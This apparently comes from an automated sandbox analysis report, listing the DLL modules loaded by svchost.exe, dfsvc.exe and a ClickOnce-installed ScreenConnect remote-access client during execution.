Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: windowsperformancerecordercontrol.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: weretw.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: faultrep.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wer.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: dfshim.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.ClientService.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Apps\2.0\3HG45VN8.TWA\PQH5JCRN.MML\scre..tion_25b0fbb6ef7eb094_0018.0002_39677f8182788693\ScreenConnect.WindowsClient.exe	Section loaded: cryptsp.dll
